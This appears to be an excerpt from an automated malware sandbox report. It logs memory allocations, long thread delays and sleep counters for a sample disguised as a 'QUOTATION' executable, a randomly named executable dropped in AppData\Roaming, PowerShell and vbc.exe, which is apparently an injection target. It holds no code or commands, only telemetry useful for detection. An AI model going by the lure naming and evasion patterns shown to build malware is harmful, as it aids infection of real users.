                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 54F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 71A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 7020000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 1160000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 9C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: 9E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeMemory allocated: AE40000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 4EC0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 6A90000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 5070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599104Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597951Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597169Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597039Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596708Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599196
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596128
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595889
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594728
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594511
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 593609
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5003Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 376Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7075Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 458Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4194Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 5646Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 7607
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8128Thread sleep count: 4194 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8128Thread sleep count: 5646 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599546s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599104s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598641s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -598063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597951s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597843s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597734s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597625s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597516s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597169s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -597039s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596938s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596708s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -596016s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595563s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595203s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -595094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594640s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 8104Thread sleep time: -594422s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe TID: 8116Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe TID: 8184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -27670116110564310s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599875s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 2848Thread sleep count: 2250 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 2848Thread sleep count: 7607 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599766s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599641s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599531s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599422s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599312s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599196s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -599093s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598984s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598875s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598765s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598656s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598547s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598437s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598328s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598219s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598109s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -598000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597890s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597781s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597671s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597562s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597453s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597344s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597234s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597125s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -597016s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596906s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596796s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596687s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596578s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596469s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596359s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596250s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596128s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -596000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -595889s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -595780s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594728s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594625s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594511s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594391s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594281s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594172s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -594062s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -593953s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4268Thread sleep time: -593844s >= -30000s
